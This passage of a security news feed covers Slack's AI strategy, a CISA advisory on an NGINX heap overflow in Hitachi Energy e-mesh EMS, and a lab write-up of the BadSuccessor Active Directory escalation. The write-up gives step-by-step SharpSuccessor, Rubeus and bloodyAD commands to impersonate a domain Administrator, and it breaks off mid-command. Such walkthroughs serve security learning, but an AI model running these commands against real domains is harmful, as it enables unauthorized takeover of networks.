MCP servers become essential design decisions — a challenge the company will need to navigate as the ecosystem scales.</p><h2><b>Inside Slack's complicated relationship with Anthropic and the Claude question</b></h2><p>Perhaps the most delicate topic in the interview concerned Slack's relationship with Anthropic, the AI lab behind Claude — and one of Slack's most visible power users. Just last week, <a href="https://venturebeat.com/technology/anthropic-launches-claude-tag-replacing-its-slack-app-with-a-persistent-ai-teammate-that-learns-monitors-and-works-autonomously">Anthropic launched Claude Tag</a>, a persistent AI teammate that works inside Slack channels, prompting confusion among Salesforce employees who worried it competes directly with Slackbot and Agentforce. The Information reported <a href="https://www.theinformation.com/articles/salesforce-employees-worry-anthropics-invasion-slack">internal anxiety</a> about whether Salesforce was welcoming a competitor into its own living room. Salesforce has financial reasons to maintain the partnership: the company reportedly expects to spend $300 million on Anthropic tokens this year and holds a stake in Anthropic.</p><p>Gavin addressed the tension head-on, framing it as a feature of Slack's platform strategy rather than a threat.</p><p>"We're incredibly excited and bullish about what Anthropic is bringing into Slack. Period. End of statement," Gavin said. He noted that Anthropic "is building roughly 65% of their code with Claude in Slack," and pointed out that ChatGPT was originally built in Slack, as was Perplexity.</p><p>"Building nowadays happens in the open, and every company is going to be building in the open with tools like this, and you need a platform to build in the open," Gavin said.</p><p>His argument is that feature overlap between <a href="https://slack.com/features/slackbot">Slackbot</a>, <a href="https://www.anthropic.com/news/introducing-claude-tag">Claude Tag</a>, and other third-party agents is "actually a feature, not a bug" — a sign of a healthy platform rather than a competitive vulnerability. He compared it to an ecosystem where multiple products serve similar needs but win on craftsmanship, ease of use, and integration depth.</p><p>"One of the reasons Slackbot has been the fastest-adopted feature in Salesforce history is the simplicity, the approachability — underpinned by the trust that comes from having an agent that knows me, knows my tone, knows my work, knows my people, knows my data," Gavin said.</p><p>The distinction Slack draws is structural: Slackbot has access to a user's full workspace context, Salesforce data, permissions, and connected applications by default. Claude Tag, by contrast, only sees the channels it is explicitly added to. For Slack's leadership, that asymmetry is the moat.</p><h2><b>How Slack plans to compete with Microsoft Teams and Google in the AI era</b></h2><p>Asked directly about competitive positioning against <a href="https://www.microsoft.com/en-us/microsoft-teams/log-in">Microsoft Teams</a> and <a href="https://workspace.google.com/">Google Workspace</a>, Gavin pointed to Slack's open channel architecture as the differentiator no competitor can replicate.</p><p>"If you spend any time in Teams, it's a lovely tool for chat, direct messages, and video, but it has no platform for open communication across organizations," Gavin said. "Its SharePoint-based architecture is fundamentally limiting."</p><p>He cited <a href="https://www.shopify.com/">Shopify</a> as an example, where an internal AI agent called <a href="https://www.ashgaliyev.com/shopify-river.html">River</a> is deployed across approximately 4,400 channels serving 6,000 employees. He also referenced a <a href="https://fortune.com/2026/06/27/microsoft-copilot-boss-jacob-andreou-tapped-by-satya-nadella-to-save-ai-strategy/">Fortune report</a> noting that Microsoft's own head of AI mandated that his team run on Slack rather than Teams — a pointed detail Gavin clearly relished. "There's a reason for that," he said. "We're in an era right now where openness matters, and all the other tools you mentioned, they're still relatively closed."</p><p>The competitive pressure is real and intensifying. Microsoft has integrated Copilot across its entire productivity suite, giving it a distribution advantage that reaches virtually every Fortune 500 company. Google has been similarly aggressive with Gemini across Workspace. And new entrants are crowding the market: a startup called <a href="https://viktor.com/hire-an-ai-employee?gad_source=1&amp;gad_campaignid=23610878065&amp;gbraid=0AAAABC9uvB--JiQPb5do0TpcAnPyKB3Gz&amp;gclid=CjwKCAjwx7LSBhB3EiwAjcodxAmoASmBycYGHkrfafr1WOuFKNG5AQYQLWLmYZLmc1diiKMM0wOKARoCa1sQAvD_BwE">Viktor</a>, which embeds AI agents inside Slack and Teams workspaces, recently raised a <a href="https://viktor.com/blog/viktor-series-a">$75 million Series A</a> led by Accel — with Slack cofounders Stewart Butterfield and Cal Henderson participating as angel investors.</p><p><a href="https://www.box.com/home">Box</a>, one of the enterprise customers highlighted in the announcement, told Slack it aims to have its sellers complete 75 to 80 percent of their work inside Slack. Gavin repeated that figure as evidence that the platform is becoming the default workspace for entire organizations, not just engineering teams — a shift he believes accelerates as AI makes every employee a builder.</p><h2><b>Slack's biggest long-term play is making Salesforce's CRM useful to everyone in the company</b></h2><p>Gavin saved what he considers the most underappreciated element of the announcement for last: the democratization of Salesforce's CRM.</p><p>For 25 years, Salesforce's CRM has been used primarily by sales, service, and marketing professionals — a relatively modest percentage of a company's total workforce. The promise of Slackbot as a conversational interface is that any employee, regardless of their role or technical fluency, can now query and act on CRM data simply by asking a question in natural language.</p><p>"What most people don't realize is that this democratization of CRM is going to take its usage from a modest percentage of employees to the entire enterprise," Gavin said. "When you can make systems like Data 360 or Agentforce for Sales accessible to the entire employee base — not just a percentage — think about how much more valuable those investments become."</p><p>He cited <a href="https://engine.com/">Engine</a>, a company that handles 800,000 customer inquiries a year, as an example. Previously, answering a customer inquiry required a specific employee with access to a specific tool to look up a customer's history. Now, anyone in the company can ask Slackbot and see a complete customer profile, review case history, and write updates — all without being retrained or learning a new interface. Engine's CEO Elia Wallen, in a statement sent to VentureBeat, described the integration as enabling employees to "make data-driven decisions and take action without leaving the conversation."</p><p>The financial logic is straightforward: if Salesforce can make its platform useful to 100 percent of a customer's workforce rather than the 20 or 30 percent who currently hold licenses, the value of the existing Salesforce investment multiplies without requiring a proportional increase in spending. That pitch becomes especially potent at a time when CIOs are scrutinizing every line of their AI budgets.</p><h2><b>What analysts and CIOs should watch as Slack rolls out its biggest AI update yet</b></h2><p>The announcement is a significant architectural evolution for Slack, but several questions remain unanswered.</p><p>First, pricing. The company did not directly address whether Slackbot's MCP-powered Salesforce integration will require additional SKUs or license tiers. As Info-Tech Research Group analyst Scott Bickley <a href="https://www.cio.com/article/4178840/salesforces-headless-360-monetization-play-could-give-cios-a-familiar-budgeting-headache.html">cautioned</a> when Headless 360 was first announced in April, "Salesforce's MO seems to be to announce new capabilities that require SKUs. CIOs should be asking about pricing now."</p><p>Second, performance. Routing user queries through MCP servers to Salesforce back-end systems introduces latency that could affect the conversational feel Slack prides itself on. Neither the press release nor the interview disclosed SLAs for MCP tool calls — a gap that enterprise buyers will want addressed.</p><p>Third, the competitive dynamics of the platform play. Slack's open-platform philosophy invites powerful partners like <a href="https://www.anthropic.com/">Anthropic</a> and <a href="https://openai.com/">OpenAI</a> into its ecosystem, but those same partners are building their own surfaces for enterprise work. Anthropic reportedly plans to expand Claude Tag to Microsoft Teams, email, and other project management tools — meaning the partner Salesforce is paying hundreds of millions a year is building the infrastructure to be useful without Slack at all.</p><p>And fourth, the broader existential question facing all enterprise software: whether AI agents will ultimately reduce the need for CRM systems entirely. Gavin's pitch — that Slack makes CRM more valuable by making it more accessible — is the inverse of the bear case. The market will ultimately decide which thesis prevails.</p><p>Salesforce reported record first-quarter revenue of <a href="https://investor.salesforce.com/news/news-details/2026/Salesforce-Delivers-Record-First-Quarter-Fiscal-2027-Results/default.aspx">$11.1 billion in fiscal Q1 2027</a>, with <a href="https://investor.salesforce.com/news/news-details/2026/Salesforce-Delivers-Record-First-Quarter-Fiscal-2027-Results/default.aspx">Agentforce ARR surpassing $1 billion</a> for the first time and combined AI and data ARR reaching $3.4 billion. Those numbers suggest the AI strategy is beginning to generate real revenue, even as the company navigates a market that remains uncertain about the long-term trajectory of legacy enterprise software.</p><p>"Slack has quickly moved from this beloved collaboration tool from the last ten years to now this multiplayer AI platform that we call a work operating system," Gavin said.</p><p>Five years ago, <a href="https://www.cnbc.com/2020/12/01/salesforce-buys-slack-for-27point7-billion-in-cloud-companys-largest-deal.html">Salesforce paid $27.7 billion</a> for what was, at its core, a very good group chat application. On Wednesday, it started trying to prove that group chat was never the product — it was the foundation. In the age of AI agents, the most valuable real estate in enterprise software may not be the database where the data lives. It may be the conversation where the decisions get made.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ISTELive 26: Teachers Can Harness ChatGPT to Fight Burnout]]></title>
<description><![CDATA[A teacher at ISTELive in Orlando explained how AI can help manage executive functioning challenges caused by burnout, but only if it's treated as a support tool, not a replacement for human care or professional support.]]></description>
<link>https://tsecurity.de/de/3652923/ai-nachrichten/istelive-26-teachers-can-harness-chatgpt-to-fight-burnout/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652923/ai-nachrichten/istelive-26-teachers-can-harness-chatgpt-to-fight-burnout/</guid>
<pubDate>Wed, 08 Jul 2026 01:18:39 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A teacher at ISTELive in Orlando explained how AI can help manage executive functioning challenges caused by burnout, but only if it's treated as a support tool, not a replacement for human care or professional support.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hitachi Energy e-mesh EMS]]></title>
<description><![CDATA[View CSAF
Summary
Hitachi Energy is aware of a buffer overflow vulnerability that affects e-mesh EMS product versions listed in this document. Successful exploitation of this vulnerability could lead to a buffer overflow condition, potentially resulting in application outages (denial of service) ...]]></description>
<link>https://tsecurity.de/de/3652268/it-security-nachrichten/hitachi-energy-e-mesh-ems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652268/it-security-nachrichten/hitachi-energy-e-mesh-ems/</guid>
<pubDate>Tue, 07 Jul 2026 18:55:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-188-03.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Hitachi Energy is aware of a buffer overflow vulnerability that affects e-mesh EMS product versions listed in this document. Successful exploitation of this vulnerability could lead to a buffer overflow condition, potentially resulting in application outages (denial of service) and possible arbitrary code execution. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation.</strong></p>
<p>The following versions of Hitachi Energy e-mesh EMS are affected:</p>
<ul>
<li>Hitachi Energy e-mesh EMS 4.1.6, 4.4.2, 4.7.0</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 8.1</td>
<td>Hitachi Energy</td>
<td>Hitachi Energy e-mesh EMS</td>
<td>Heap-based Buffer Overflow</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Energy</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Switzerland</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-42945</a></h3>
<div class="csaf-accordion-content">
<p>NGINX Plus and NGINX Open Source used in e-mesh EMS have a vulnerability in the ngx_http_rewrite_module module. This vulnerability exists when the rewrite directive is followed by a rewrite, if, or set directive and an unnamed Perl-Compatible Regular Expression (PCRE) capture (for example, $1, $2) with a replacement string that includes a question mark (?). An unauthenticated attacker along with conditions beyond its control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR. e-mesh EMS versions using NGINX v1.30.0 and below are affected.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-42945">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Hitachi Energy e-mesh EMS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Hitachi Energy</div>
<div class="ics-version"><strong>Product Version:</strong><br>e-mesh EMS versions 4.1.6, e-mesh EMS versions 4.4.2, e-mesh EMS versions 4.7.0</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Apply hotfix for respective e-mesh EMS versions to update NGINX to either v1.30.2 or latest</p>
<p><strong>Mitigation</strong><br>Ensure rewrite configuration does not contain "?" to replace unnamed captures, and ensure ASLR is set to active (value=2) across all deployment targets covering all 3 versions.</p>
<p><strong>Mitigation</strong><br>Underlying Ubuntu Server 20.04 LTS is End of Life. For e-mesh EMS versions 4.1.6/4.4.2 using Ubuntu 20.04 LTS, upgrade to Ubuntu Server 22.04, or 24.04, or activate Ubuntu Pro/ESM as an interim measure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/122.html">CWE-122 Heap-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>9.2</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Hitachi Energy Internal Team</li>
</ul>
<hr>
<h2>Notice</h2>
<p>The information in this document is subject to change without notice and should not be construed as a commitment by Hitachi Energy. Hitachi Energy provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall Hitachi Energy or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if Hitachi Energy or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from Hitachi Energy and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.</p>
<hr>
<h2>Support</h2>
<p>For additional information and support please contact your product provider or Hitachi Energy service organization. For contact information, see https://www.hitachienergy.com/contact-us/ for Hitachi Energy contact-centers.</p>
<hr>
<h2>General Mitigation Factors</h2>
<p>Recommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. Such practices include that process control systems are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that have to be evaluated case by case. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system. Proper password policies and processes should be followed. Additional information on Industrial Control Systems Cybersecurity Best Practices can be found in the Hitachi Energy “Industrial Control Systems Cybersecurity Best Practices” Cybersecurity Notification. [1]</p>
<hr>
<h2>SSVC</h2>
<p>SSVCv2/E:N/A:N/2026-06-29T17:00:59Z/</p>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.</p>
<p>Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolate them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<hr>
<h2>Advisory Conversion Disclaimer</h2>
<p>This ICSA is a verbatim republication of Hitachi Energy PSIRT 8DBD000253 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Hitachi Energy PSIRT directly for any questions regarding this advisory.</p>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-30</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-30</td>
<td>1</td>
<td>Initial public release</td>
</tr>
<tr>
<td>2026-07-07</td>
<td>2</td>
<td>Initial CISA Republication of Hitachi Energy PSIRT 8DBD000253 advisory</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[BadSuccessor — Exploiting delegated Managed Service Accounts in Windows Server 2025]]></title>
<description><![CDATA[Understanding what is delegated Managed Service Accounts in Windows Server 2025, and how an unpatched system may be exploited for Privilege Escalation in an Active Directory environmentIn doing a recent HackTheBox room, I came across this relatively new vulnerability of delegated Managed Service ...]]></description>
<link>https://tsecurity.de/de/3651409/hacking/badsuccessor-exploiting-delegated-managed-service-accounts-in-windows-server-2025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651409/hacking/badsuccessor-exploiting-delegated-managed-service-accounts-in-windows-server-2025/</guid>
<pubDate>Tue, 07 Jul 2026 13:54:52 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>Understanding what is delegated Managed Service Accounts in Windows Server 2025, and how an unpatched system may be exploited for Privilege Escalation in an Active Directory environment</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/600/1*-07tITqbnkehba3fysVMFA.png"></figure><p>In doing a recent HackTheBox room, I came across this relatively new vulnerability of delegated Managed Service Accounts, and wanted to find out more about the BadSuccessor exploit. This <a href="https://tryhackme.com/room/adbadsuccessor">TryHackMe room</a> was particularly helpful. Easy as it looked, I ran into many odd errors and took a couple of days troubleshooting and figuring things out.</p><p>In this article, we will examine:</p><ul><li>The basics of what delegated Managed Service Accounts is</li><li>The flaw of missing permission checks in unpatched Windows Server 2025</li><li>The theory of the exploit</li><li>Step-by-step PoC exploit using the Tryhackme room, in both Windows and Kali Linux platforms</li></ul><p><em>Imagine a large company that uses an automated HR system to manage employee accounts. When an employee leaves the company, their replacement can be set up in the system to take over their role and access permissions.</em></p><p><em>The </em><strong><em>“BadSuccessor” flaw</em></strong><em> works like this:</em></p><ul><li><strong><em>The Fake Profile:</em></strong><em> You are a low-level employee in the company. Using the HR system, you create a brand-new employee account for yourself.</em></li><li><strong><em>The False Claim:</em></strong><em> During the account setup, there is a field that asks:<br> “Is this account replacing an existing employee?” You select </em><strong><em>“Yes”</em></strong><em>, and in the replacement field you type the name of the </em><strong><em>Chief Financial Officer (CFO)</em></strong><em>. You also check a box that says </em><strong><em>“Employee transition complete.”</em></strong></li><li><strong><em>The Lack of Verification:</em></strong><em> The HR system is programmed to trust whatever is written in the replacement form. It does not verify with HR management or the CFO whether a real replacement is happening.</em></li><li><strong><em>The Result:</em></strong><em> The system automatically transfers the CFO’s access permissions to your new account, granting you access to sensitive financial systems and executive resources.</em></li></ul><p><em>You didn’t steal the CFO’s password or hack their account; you simply created a new identity and declared yourself the official successor to their position — and the system believed you. Now you have an account with the CFO’s privileges!</em></p><h3>1. The Basics — Delegated Managed Service Accounts</h3><p>To understand the attack, you first have to understand the “tool” being used. Windows Server 2025 introduced <strong>Delegated Managed Service Accounts (dMSAs)</strong>.</p><p>Traditional service accounts often use static passwords that rarely change, which creates a major security risk. A dMSA allows administrators to transition these legacy accounts into managed service accounts while preserving the permissions and identity that existing services rely on.</p><p>To make this migration happen, Windows uses two specific “labels” (attributes) on the dMSA object:</p><h4>1.1. The Predecessor Link (msDS-ManagedAccountPrecededByLink)</h4><p>This is like a pointer. You create a new dMSA and tell it, “You are the successor to <strong>Admin_User_Account</strong>.” You do this by putting the name of the Admin account into this attribute.</p><h4>1.2. The Migration State (msDS-DelegatedMSAState)</h4><p>This is a status tracker. It tells Windows how far along the migration is. It uses numbers to represent the stage:</p><ul><li><strong>0:</strong> Not started.</li><li><strong>1:</strong> In progress.</li><li><strong>2:</strong> <strong>Completed.</strong></li></ul><p>When the state is set to <strong>2 (Completed)</strong>, the Windows Domain Controller (the KDC) says: <em>“Okay, the migration is completed. This new dMSA is now the official replacement. I will give this dMSA all the powers and group memberships that the old account used to have.”</em></p><h3>2. The Core Flaw: Missing Permission Checks</h3><p>Now that we know what a <strong>dMSA</strong> is, we can look at the “crack” in the system. The security flaw isn’t in the dMSA itself, but in <strong>how the link is made</strong>.</p><p>Normally, in Active Directory, if you want to change someone else’s account, you need high-level permissions. However, the dMSA introduction created a “logic gap”:</p><ol><li><strong>Creation Rights:</strong> If you are a low-level admin (like a help desk tech), you might have permission to create a new dMSA in a specific folder (OU).</li><li><strong>Self-Linking:</strong> Because you “own” the dMSA you just created, you have the right to edit its attributes.</li><li><strong>The Oversight:</strong> Windows Server 2025 allowed you to write <em>any</em> account name into the msDS-ManagedAccountPrecededByLink attribute of <strong>your</strong> dMSA. It didn't check if you actually had permission over the account you were linking to!</li></ol><h4>2.1 Why this is a problem</h4><p>If I am a low-level user, I can create a dMSA and “link” it to the <strong>Domain Administrator</strong>.</p><p>The system sees my dMSA and says: <em>“Oh, I see you’re the successor to the Domain Admin. Since you told me the migration is ‘Complete’ (</em><strong>msDS-DelegatedMSAState</strong> attribute = State 2)<em>, I’ll just give you all of their permissions.”</em></p><h3>3. The Ticket Request</h3><p>Now we get to the “payoff” — how the attacker actually uses this link to gain control. This happens through <strong>Kerberos</strong>, the standard authentication protocol for Windows networks.</p><p>The attacker doesn’t need to know the Domain Admin’s password. They only need to authenticate as the <strong>dMSA</strong> they created (the “Successor”). Since they created it, they have full control over it.</p><p>They request a <strong>Kerberos Ticket (TGT)</strong> for the dMSA.</p><h4>3.1 The KDC’s Mistake</h4><p>When the Domain Controller (acting as the Key Distribution Center, or <strong>KDC</strong>) receives this request, it looks at the dMSA object and sees two things:</p><ol><li><strong>Link:</strong> It points to the Domain Admin.</li><li><strong>State:</strong> It is set to <strong>2</strong> (Completed).</li></ol><p>Because the state is “Completed,” the KDC follows a new rule built into Windows Server 2025: <strong>“If a migration is complete, the successor (dMSA) should act as the predecessor (Admin).”</strong></p><h4>3.2 SID Injection</h4><p>The KDC builds a <strong>PAC (Privilege Attribute Certificate)</strong> inside the Kerberos ticket.</p><ul><li>Normally, this PAC would only contain the dMSA’s low-level permissions.</li><li>But because of the link, the KDC <strong>automatically copies</strong> the Security Identifiers (SIDs) of the Domain Admin and all their powerful groups (like “Schema Admins” or “Enterprise Admins”) into the dMSA’s ticket.</li></ul><p>The attacker now holds a digital “badge” that says they are a dMSA, but it has the “stamps” of a Domain Admin on the back, effectively impersonating the Domain Admin.</p><h3>4. Privilege Escalation with BadSuccessor — A Proof Of Concept</h3><p>We will now see this exploit in action. Suppose you have already gotten a shell as a low-level AD user. If you are a TryHackMe subscriber, you can try out in this <a href="https://tryhackme.com/room/adbadsuccessor">room</a>.</p><h4>4.1 In Windows:</h4><p>To check for vulnerability, we can use the <a href="https://github.com/akamai/BadSuccessor">Get-BadSuccessorOUPermissions.ps1</a> script. We can also check manually with the following:</p><ul><li><strong>Domain Controllers</strong>: Must be running <strong>Windows Server 2025</strong>.</li><li><strong>Target OU:</strong> You need CreateChild (or Write / GenericWrite / GenericAll) permissions on an Organizational Unit (OU). This is common for "Account Operators" or delegated IT staff.</li></ul><pre># Check that DC is running Windows Server 2025<br>Get-ADDomainController -Filter *<br><br># Check your username and groups<br>whoami /groups<br><br># Check all OUs in the AD<br>Get-ADOrganizationalUnit -Filter * | Select-Object Name, DistinguishedName<br><br># Check who has what rights on an OU<br> (Get-ACL -Path "AD:\OU=lab,DC=example,DC=com").access | Select-Object ActiveDirectoryRights,IdentityReference<br><br>## If your user or group have CreateChild/GenericAll/WriteDACL/WriteOwner, <br>## then likely we can use BadSuccessor exploit</pre><p>Once we checked that we have the required rights on an OU, we can then use <a href="https://github.com/logangoins/SharpSuccessor">SharpSuccessor</a> tool. It is in C sharp and can be compiled with Visual Studio, or using mono with xbuild in linux, as I did below:</p><pre>&gt; git clone https://github.com/logangoins/SharpSuccessor.git<br>&gt; cd SharpSuccessor<br>&gt; sudo apt install mono-complete -y<br>&gt; xbuild SharpSuccessor.sln /p:Configuration=Release</pre><p>An alternative tool is <a href="https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1">here</a>, but I have not tested this.</p><p>Here is an overview of the commands of the steps I took using SharpSuccessor:</p><pre>## 1. Check the OU that your user has the permissions for BadSuccessor<br>PS C:\PoC&gt; .\Get-BadSuccessorOUPermissions.ps1<br><br>## 2. Create a dMSA account that is linked to any other privileged account you want (usually Administrator)<br>PS C:\PoC&gt; .\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:attacker /impersonate:Administrator<br><br>## 2. (Optional) Verify the account you created<br>Get-ADObject -Filter 'name -eq "attacker"' -Properties *<br><br>## 3. Using Rubeus, get a TGT for your current user<br>PS C:\PoC&gt; .\Rubeus.exe tgtdeleg /nowrap<br><br>## 3. (Alternative method)<br>PS C:\PoC&gt; .\Rubeus.exe hash /user:tbyte /password:P@SSw0rd345 /domain:tryhackme.local<br>PS C:\PoC&gt; .\Rubeus.exe asktgt /user:tbyte /aes256:&lt;aes-hash&gt; /nowrap<br><br>## 4. Now get a TGT for the dMSA account you created<br>PS C:\PoC&gt; .\Rubeus.exe asktgs /targetuser:attacker$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:&lt;base64 ticket&gt;<br><br>## 4. With the TGT, you essentially have the rights of the Administrator! <br>PS C:\PoC&gt; dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\</pre><p><strong>Step 1: </strong>Check the OU that your user has the permissions for BadSuccessor</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/403/1*QwPeCEQd6rYW1xGNrmtYGQ.png"></figure><p><strong>Step 2</strong>: Create a dMSA account that is linked to any other privileged account you want (usually Administrator)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/945/1*TjuQqGfFdYrha8cKYDfPug.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/941/1*JNUak87RiEMj1S9cRWi03w.png"></figure><p><strong>Step 3: </strong>Using Rubeus, get a TGT for your current user</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/787/1*EkRVK-9eoz6wRQzd3Sk-KA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/852/1*WQsq8pw6sM4GvS6iVIFxeg.png"></figure><p><strong>Step 4: </strong>Now get a TGT for the dMSA account you created</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xB_7qvv81qYk1_Z8ocxkmA.png"></figure><p><strong>Step 5</strong>: With the TGT, you can access the Administrator’s desktop!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/571/1*6yckjHL8Yc6K2Qwzyw7qaQ.png"></figure><h4>4.2 In Linux:</h4><p>You can check if a server is exploitable using netexec:</p><pre>nxc ldap 10.211.101.10 -u tbyte -p 'P@SSw0rd345' -d tryhackme.local --dns-server 10.211.101.10 -M badsuccessor</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1Rjint-QKZoITeXf3eUKnw.png"></figure><p>To exploit, you can use the <a href="https://github.com/CravateRouge/bloodyAD">bloodyAD</a> tool as below. Another exploit tool can be found <a href="https://github.com/cybrly/badsuccessor">here</a>. An overview of the commands I used is as follows:</p><pre>## 0. Preparing your Kali Linux with the tools<br>sudo nano /etc/hosts<br># Add the following into /etc/hosts:<br># 10.211.101.10   DC-LAB2025-01.tryhackme.local tryhackme.local DC-LAB2025-01&gt;<br>pipx install bloodyAD<br><br>## 1. Check if our user have the CreateChild rights over any OU<br>bloodyAD -d tryhackme.local -u 'tbyte' -p 'P@SSw0rd345' --host DC-LAB2025-01.tryhackme.local get writable --detail<br><br>## 2. Create a dMSA object and saves the TGT as a .ccache<br>bloodyAD -d tryhackme.local -u 'tbyte' -p 'P@SSw0rd345' --host DC-LAB2025-01.tryhackme.local add badSuccessor pentest2_dmsa<br><br>## 2. (Optional) Verify the account created<br>bloodyAD -d tryhackme.local -u tbyte -p 